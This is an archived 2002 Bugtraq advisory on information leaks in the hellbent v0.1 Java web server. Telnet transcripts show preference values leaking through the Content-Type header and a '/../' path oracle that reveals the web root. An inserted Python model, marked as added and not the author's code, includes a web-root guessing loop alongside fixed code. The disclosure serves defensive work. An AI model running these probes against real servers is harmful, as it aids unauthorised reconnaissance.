Bugtraq mailing list archives

Vulnerability in hellbent


From: joetesta () hushmail com
Date: Fri, 18 Jan 2002 09:41:37 -0800


-----BEGIN PGP SIGNED MESSAGE-----

To moderator:

I posted this on Wednesday, but it was not passed to the list and I didn't get anything back.  Here it is again.  
Thanks.
- -----

Vulnerability in hellbent



    Overview

hellbent v0.1 is a Java web server available from
http://hogs.rit.edu/~joet/code/.  Under certain conditions the server leaks
configuration details, including the location of the web root.



    Details

If an attacker can create a file with an arbitrary name in the web root, the
server can be made to disclose the value of any entry in the 'hellbent.prefs'
file: as the transcript below shows, a request for 'index.webroot' is answered
with the value of the 'webroot' entry in the Content-Type header, and likewise
for 'index.ipallow'.  This preferences file holds the web root, the paths to
the access and error logs, and the IP access lists.

Note that, with the exception of the IP access lists, a local attacker who can
write to the web root would normally have all of this information already.
Below is a demonstration of the problem:



[jdog@ghettofied webroot]$ pwd
/home/jdog/hellbent/webroot
[jdog@ghettofied webroot]$ touch index.webroot
[jdog@ghettofied webroot]$ telnet localhost 80
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
GET /index.webroot

HTTP/0.9 200 OK
Content-Length: 0
Content-Type: /home/jdog/hellbent/webroot/
Server: [ hellbent java webserver v0.1 ]

Connection closed by foreign host.
[jdog@ghettofied webroot]$ touch index.ipallow
[jdog@ghettofied webroot]$ telnet localhost 80
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
GET /index.ipallow

HTTP/0.9 200 OK
Content-Length: 0
Content-Type: 129.21.*.*;127.0.0.1
Server: [ hellbent java webserver v0.1 ]

Connection closed by foreign host.
[jdog@ghettofied webroot]$




A remote attacker can also deduce the web root by exhaustive guessing.
Although hellbent correctly denies requests whose relative path leads outside
the web root, a relative path that exits the web root and then re-enters it is
still allowed.  This behaviour was pointed out on the Vuln-Dev mailing list
while the server was being developed:

    http://www.securityfocus.com/archive/82/73778

Below is a demonstration of how the web root can be deduced:



[jdog@ghettofied jdog]$ telnet localhost 80
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
GET /../

HTTP/0.9 403 Forbidden

<html>
<head>
<title>403 Forbidden</title>
</head>
<body>

<center><h2>403 Forbidden</h2></center>

</body>
</html>
Connection closed by foreign host.
[jdog@ghettofied jdog]$ telnet localhost 80
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
GET /../webroot/index.html

HTTP/0.9 200 OK
Content-Length: 38
Content-Type: text/html
Server: [ hellbent java webserver v0.1 ]

    This is the contents of 'index.html'.

Connection closed by foreign host.
[jdog@ghettofied jdog]$


If the attacker's path resolves to a location outside the web root, the server
returns a 403 error.  If the path leads back into the web root, the server
returns the requested object.  The difference between the two responses is an
oracle: by requesting '/../<guess>/index.html' for a list of candidate
directory names, the attacker learns the name of the web root directory when a
guess is answered with 200 instead of 403, and can then repeat the process one
level up ('/../../<guess>/webroot/index.html') to recover the rest of the path.
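The two behaviours above, the preferences leak through Content-Type and the
exit-and-re-enter path oracle, modelled in Python as an added example.  This is
not hellbent's source (the page shows none).  It assumes that v0.1 chose the
Content-Type by looking the file extension up in the same properties map that
holds the server settings, and that the path check canonicalised the request
and then tested whether the result lay under the web root; the preferences
values, the in-memory files, and every function name are this example's own,
chosen to reproduce the transcripts.  The hardened variants keep MIME types in
a separate table and refuse any request that steps above the root at any
point, whether or not it leads back inside.

```python
"""Model of the two hellbent v0.1 behaviours described in this advisory.

Added example, not hellbent's code.  Assumptions (not shown on the page):
the server resolved Content-Type by looking the request's file extension
up in the same properties map that holds its settings, and it checked
paths by canonicalising the request and testing the result against the
web root.  Names and values below are constructed to match the transcripts.
"""
import posixpath

# Constructed hellbent.prefs contents: settings and extension-to-MIME
# mappings share one key space (the assumed v0.1 layout).
HELLBENT_PREFS = {
    "webroot": "/home/jdog/hellbent/webroot/",
    "accesslog": "/home/jdog/hellbent/access.log",
    "errorlog": "/home/jdog/hellbent/error.log",
    "ipallow": "129.21.*.*;127.0.0.1",
    "html": "text/html",
    "txt": "text/plain",
}

# Constructed in-memory file system standing in for the disk.
FILES = {
    "/home/jdog/hellbent/webroot/index.html":
        "    This is the contents of 'index.html'.\n",
    "/home/jdog/hellbent/webroot/index.webroot": "",
    "/home/jdog/hellbent/webroot/index.ipallow": "",
}

# Hardened variant: MIME types live in their own table, never in the prefs.
MIME_TYPES = {"html": "text/html", "txt": "text/plain"}
DEFAULT_TYPE = "application/octet-stream"


def extension(name):
    return name.rsplit(".", 1)[1] if "." in name else ""


def content_type_v01(name, prefs):
    # 'index.webroot' -> prefs['webroot']: the configuration leak.
    return prefs.get(extension(name), DEFAULT_TYPE)


def content_type_fixed(name, prefs):
    # Configuration is never consulted when building a response header.
    return MIME_TYPES.get(extension(name), DEFAULT_TYPE)


def resolve_v01(webroot, request_path):
    # Canonicalise first, then require the result to lie under the root.
    # '/../webroot/index.html' canonicalises back inside the root, so it
    # passes and tells the attacker the directory is named 'webroot'.
    root = webroot.rstrip("/")
    full = posixpath.normpath(root + "/" + request_path.lstrip("/"))
    if full != root and not full.startswith(root + "/"):
        return None
    return full


def resolve_fixed(webroot, request_path):
    # Walk the segments and refuse the request the moment it would step
    # above the root, even if later segments would lead back inside.
    root = webroot.rstrip("/")
    parts = []
    for seg in request_path.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if not parts:
                return None  # would leave the root: 403
            parts.pop()
            continue
        parts.append(seg)
    return root + "/" + "/".join(parts) if parts else root


def handle(request_path, resolve, content_type, prefs=HELLBENT_PREFS, files=FILES):
    """Return (status, content_type, body) for a GET, modelled on the
    transcripts: 403 outside the root, 404 for a missing object, else 200."""
    full = resolve(prefs["webroot"], request_path)
    if full is None:
        return 403, None, ""
    if full not in files:
        return 404, None, ""
    return 200, content_type(posixpath.basename(full), prefs), files[full]


def handle_v01(request_path):
    return handle(request_path, resolve_v01, content_type_v01)


def handle_fixed(request_path):
    return handle(request_path, resolve_fixed, content_type_fixed)


def deduce_webroot_name(server, candidates):
    """The remote oracle from the advisory: '/../<name>/index.html' is
    served only when <name> is the web root's directory name."""
    for name in candidates:
        status, _, _ = server("/../%s/index.html" % name)
        if status == 200:
            return name
    return None


if __name__ == "__main__":
    for p in ("/index.webroot", "/index.ipallow", "/../", "/../webroot/index.html"):
        print(p, handle_v01(p)[:2], handle_fixed(p)[:2])
    print("guessed:", deduce_webroot_name(handle_v01, ["htdocs", "www", "webroot"]))
```

handle_v01 reproduces both transcripts: the Content-Type of 'index.webroot' is
the web root setting, and '/../webroot/index.html' is served while '/../' is
refused.  handle_fixed answers 403 to every request that climbs above the
root and never returns a setting as a Content-Type, so the guessing loop in
deduce_webroot_name learns nothing from it.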



    Solution

Version 0.11, which fixes both problems, is available at:
    http://hogs.rit.edu/~joet/code/hellbent_v011.zip



    Vendor Status

Holger Zimmermann <zimpel () t-online de> contacted the author, Joe Testa, via
<jst3290 () cs rit edu> and <joetesta () hushmail com> on Sunday, January 13, 2002.
I promptly replied and issued a fix on the same day.




    - Joe Testa

e-mail:   joetesta () hushmail com
web page: http://hogs.rit.edu/~joet/
AIM:      LordSpankatron



-----BEGIN PGP SIGNATURE-----
Version: Hush 2.1
Note: This signature can be verified at https://www.hushtools.com

wl0EARECAB0FAjxIXiEWHGpvZXRlc3RhQGh1c2htYWlsLmNvbQAKCRA/wHT6vruBNCMn
AJ9YPO5QqTuVHT7BrR5wkJ+04z8yZgCfUkh7bT/iffPii07bG9+42zY+W3Y=
=Y5Sd
-----END PGP SIGNATURE-----

